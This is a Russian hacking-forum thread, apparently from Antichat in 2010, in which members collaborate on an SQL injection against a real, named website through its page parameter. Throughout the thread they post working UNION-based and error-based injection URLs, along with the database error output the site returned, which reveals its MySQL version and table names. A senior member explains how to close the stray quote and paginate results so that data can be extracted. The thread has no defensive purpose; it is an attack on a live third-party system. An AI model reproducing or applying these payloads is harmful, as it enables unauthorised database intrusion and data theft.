Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
10.05.2010, 15:57
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от olishort
ошибка
нуллбайт попробуй 
|
|
|
10.05.2010, 15:59
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
--
/*
%23
{
|
|
|
|
10.05.2010, 16:05
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме:
436858
Репутация:
33
|
|
вот так попробывал
page.php?page=53'+union+select+1,2,3,4,5,6,7,8,9,1 0+union+select+1,2,3,4,5,6,7,8,9,'10
SQL query SELECT * FROM mobiticket.structure_page WHERE tag = '53' union select 1,2,3,4,5,6,7,8,9,10 union select 1,2,3,4,5,6,7,8,9,'10' AND status = 'active' failed with error 1222: The used SELECT statements have a different number of columns
когда видимо подобрал, вылетает
Unknown column 'status' in 'field list'
|
|
|
|
10.05.2010, 16:09
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
http://rzd.sclub.ru/page.php?page=53'+union+select+1,2,3,4,5,6,7,8,9,' 10/*+--+%2B{
И правда, экранирование никакое не раюотает =\
|
|
|
|
10.05.2010, 16:13
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Код:
http://rzd.sclub.ru/page.php?page=53'/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+and+'1'='1
Duplicate column name ' 5.0.87-log' |
|
|
|
10.05.2010, 16:19
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Короче, крутите как слепую.
|
|
|
|
10.05.2010, 16:49
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от wildshaman
Попробуй /* вместо --+
Сообщение от wildshaman
Короче, крутите как слепую.
По поводу первого - начиная с пятой версии (5.0.какая то, не помню точно) мускула, нельзя оставлять комментарий открытым, а следовательно и использовать его не вариант.
По поводу второго - очевидно, что если строка не обрубается комментарием -- 1, то значит запрос многострочечный.
Решить это очень просто - обращаемся к той же таблице, что и первоначальный запрос, но колонки уже - произвольные данные. Далее используем where 1=1 or '1'='1 В результате вывод не будет зависеть от условия, а открытая кавычка закроется другой.
Код:
http://rzd.sclub.ru/page.php?page=53'+and+1=2+union+select+1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18+from+mobiticket.structure_page+where+1=1+or+'1'='1
Обращение к другой таблице - через запятую:
from mobiticket.structure_page, bla_bla_bla
|
|
|
|
10.05.2010, 16:53
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Грей, ты мой Бог  |
|
|
|
10.05.2010, 16:59
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Эм, а как там с лимитами?><
|
|
|
|
10.05.2010, 17:18
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от wildshaman
Эм, а как там с лимитами?><
Или через where указывая номер записи или на месте выводимой колонки юзать подзапрос.
P.S. но при желание можно и лимиты юзать, тогда еще одно объединение запроса нужно:
Код:
http://rzd.sclub.ru/page.php?page=53'+and+1=2+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18+from НУЖНА ТАБЛИЦА а тут лимиты))+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mobiticket.structure_page+where+'2'='1
Последний раз редактировалось Grey; 10.05.2010 в 17:21..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Комбинированный вид